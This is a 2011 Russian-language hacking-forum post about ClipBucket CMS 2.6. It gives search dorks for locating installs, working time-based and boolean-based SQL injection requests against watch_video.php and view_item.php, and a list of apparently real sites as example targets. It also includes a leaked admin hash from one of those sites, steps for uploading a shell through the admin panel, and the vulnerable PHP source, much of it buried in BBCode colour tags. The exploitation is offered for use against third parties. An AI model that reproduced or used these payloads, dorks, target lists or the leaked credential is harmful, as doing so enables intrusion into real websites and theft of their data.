Тема: Энциклопедия уязвимых скриптов
Показать сообщение отдельно

  #475  
Старый 02.11.2011, 01:50
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию
ClipBucket CMS

ClipBucket CMS 2.6 (последняя версия)

clip-bucket.com

prefix: cb_

dorki: Forged by ClipBucket // Arslan Hassan // view_item.php collection item type



exploits:

Time-Based

Код:
GET /watch_video.php?v=GNDB5XUWMW32' AND 666=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),CHAR(32))),1,1)) > 1),SLEEP(5),666) AND 'qwe'='qwe
или

Boolean-Based

Код:
GET /view_item.php?item=DKHM63R22191' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0,1),1,1)) > 112 AND 'qwe'='qwe&type=photos&collection=9


examples:

Цитата:
Сообщение от None  
http://video.tv-kino.com/view_item.php?collection=10&item=58HOS3XG5G4U&type =videos
Код:
admin:3afe97fe4ad12d234bec2db193e8e649
Цитата:
Сообщение от None  
http://medvideo.kz/view_item.php?item=DKHM63R22191&type=photos&collec tion=9
Цитата:
Сообщение от None  
http://watched.eu/watch_video.php?v=X7D8XUB7GAUG
Shell Upload:

Цитата:
Сообщение от None  
1) разрешить php как расширение при загрузке
2) разрешить php в шаблонах
3) упаковать в zip и через плагины
Код:
админка: /admin_area
Ну и собстенно сюрприз:

function pass_code($string) {

$password = md5(md5(sha1(sha1(md5($string)))));

return $password;

}

vurnel files:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]<font color="DarkOrange">

<i>view_item.php</i>

</font>[COLOR="#007700"][/COLOR][COLOR="#0000BB"]is_viewable[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"]))

{

 if(empty([/COLOR][COLOR="#0000BB"]$item[/COLOR][COLOR="#007700"]))

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'location:'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]BASEURL[/COLOR][COLOR="#007700"]);

 else

{

 if(empty([/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]))

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'location:'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]BASEURL[/COLOR][COLOR="#007700"]);

 else

{

[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$param[/COLOR][COLOR="#007700"]= array([/COLOR][COLOR="#DD0000"]"type"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"cid"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$cdetails[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbcollection[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_collections[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$collect[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cdetails[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

 switch([/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"])

 {

 case[/COLOR][COLOR="#DD0000"]"videos"[/COLOR][COLOR="#007700"]:

 case[/COLOR][COLOR="#DD0000"]"v"[/COLOR][COLOR="#007700"]:

 {

 global[/COLOR][COLOR="#0000BB"]$cbvideo[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbvideo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_video[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$item[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]video_playable[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"]))

 {

[/COLOR][COLOR="#FF8000"]//Getting list of collection items

[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_clean[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$get_limit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]create_query_limit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$order[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]tbl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"collection_items"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]".ci_id DESC"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbvideo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]collection[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_collection_items_with_details[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$order[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$get_limit[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'items'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'open_collection'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'yes'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbvideo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]collection[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_collection_item_fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'videoid'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'ci_id,collection_id'[/COLOR][COLOR="#007700"]);

 if([/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"])

 {

[/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_merge[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]increment_views[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'videoid'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'video'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'object'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$userquery[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_user_details[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'userid'[/COLOR][COLOR="#007700"]]));

[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'c'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$collect[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]subtitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$video[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]);

} else {

[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]lang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"item_not_exist"[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

 }

 } else {

[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]lang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"item_not_exist"[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

}



}

 break;

case[/COLOR][COLOR="#DD0000"]"photos"[/COLOR][COLOR="#007700"]:

 case[/COLOR][COLOR="#DD0000"]"p"[/COLOR][COLOR="#007700"]:

 {

 global[/COLOR][COLOR="#0000BB"]$cbphoto[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbphoto[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_photo[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$item[/COLOR][COLOR="#007700"]);

 if([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"])

 {

[/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbphoto[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]collection[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_collection_item_fields[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'photo_id'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'ci_id'[/COLOR][COLOR="#007700"]);

 if([/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"])

 {

[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_merge[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$info[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]increment_views[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'photo_id'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'photo'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'object'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$userquery[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_user_details[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'userid'[/COLOR][COLOR="#007700"]]));

[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'c'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$collect[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]subtitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'photo_title'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]' &laquo; '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$collect[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'collection_name'[/COLOR][COLOR="#007700"]]);

 } else {

[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]lang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"item_not_exist"[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

}

 } else {

[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]lang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"item_not_exist"[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

}

 }

 break;

 }

}

}

} else

[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]template_files[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view_item.html'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]display_it[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR] 
watch_video.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]perm_check[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view_video'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$pages[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]page_redir[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#FF8000"]//Getting Video Key

[/COLOR][COLOR="#0000BB"]$vkey[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'v'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbvid[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_video[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vkey[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'vdo'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]video_playable[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"]))

{



[/COLOR][COLOR="#FF8000"]/**

* Please check http://code.google.com/p/clipbucket/issues/detail?id=168

* for more details about following code

*/

[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]SEO[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'yes'[/COLOR][COLOR="#007700"])

 {

[/COLOR][COLOR="#FF8000"]//Checking if Video URL is Exactly What we have created

[/COLOR][COLOR="#0000BB"]$vid_link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]videoLink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$vid_link_seo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$vid_link[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$vid_link_seo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$vid_link_seo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vid_link_seo[/COLOR][COLOR="#007700"]) -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#FF8000"]//What we are getting

[/COLOR][COLOR="#0000BB"]$server_link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$server_link_seo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$server_link[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$server_link_seo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$server_link_seo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$server_link_seo[/COLOR][COLOR="#007700"]) -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#FF8000"]//Now finally Checking if both are equal else redirect to new link

[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$vid_link_seo[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$server_link_seo[/COLOR][COLOR="#007700"])

 {

[/COLOR][COLOR="#FF8000"]//Redirect to valid link leaving mark 301 Permanent Redirect

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'HTTP/1.1 301 Moved Permanently'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$vid_link[/COLOR][COLOR="#007700"]);

 exit();

 }

}

[/COLOR][COLOR="#FF8000"]//Checking for playlist

[/COLOR][COLOR="#0000BB"]$pid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'play_list'[/COLOR][COLOR="#007700"]];

 if(!empty([/COLOR][COLOR="#0000BB"]$pid[/COLOR][COLOR="#007700"]))

 {

[/COLOR][COLOR="#0000BB"]$plist[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbvid[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]action[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_playlist[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$pid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]userid[/COLOR][COLOR="#007700"]());

 if([/COLOR][COLOR="#0000BB"]$plist[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cur_playlist'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$pid[/COLOR][COLOR="#007700"];

 }

[/COLOR][COLOR="#FF8000"]//Calling Functions When Video Is going to play

[/COLOR][COLOR="#0000BB"]call_watch_video_function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]subtitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]);

}else

[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#FF8000"]//Return category id without '#'

[/COLOR][COLOR="#0000BB"]$v_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]];

if([/COLOR][COLOR="#0000BB"]$v_cat[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'#'[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$video_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$v_cat[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

}else{

[/COLOR][COLOR="#0000BB"]$video_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$v_cat[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$v_cat[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];}

[/COLOR][COLOR="#0000BB"]$vid_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'%#%'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$video_cat[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'vid_cat'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$vid_cat[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]//Displaying The Template

[/COLOR][COLOR="#0000BB"]template_files[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'watch_video.html'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]display_it[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR] 
functions.php[/COLOR]

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'mysql_clean'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]))

 {

 if([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'no_html'[/COLOR][COLOR="#007700"]])

[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]htmlentities[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]);

 if([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'special_html'[/COLOR][COLOR="#007700"]])

[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]htmlspecialchars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]);

 if([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mysql_clean'[/COLOR][COLOR="#007700"]])

[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]);

 if([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'nl2br'[/COLOR][COLOR="#007700"]])

[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]nl2br[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]);

 return[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"];

 }

[/COLOR][COLOR="#FF8000"]//This Fucntion is for Securing Password, you may change its combination for security reason but make sure dont not rechange once you made your script run

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]pass_code[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sha1[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sha1[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"])))));

 return[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"];

 }

[/COLOR][COLOR="#FF8000"]//Mysql Clean Queries

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]sql_free[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])

 {

 if (![/COLOR][COLOR="#0000BB"]get_magic_quotes_gpc[/COLOR][COLOR="#007700"]())

 {

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);

 }

 return[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"];

 }



function[/COLOR][COLOR="#0000BB"]mysql_clean[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$replacer[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#FF8000"]//$id = clean($id);

[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]get_magic_quotes_gpc[/COLOR][COLOR="#007700"]())

 {

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);

 }

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]htmlspecialchars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]));

 if([/COLOR][COLOR="#0000BB"]$replacer[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]Replacer[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);

 return[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"];

 }

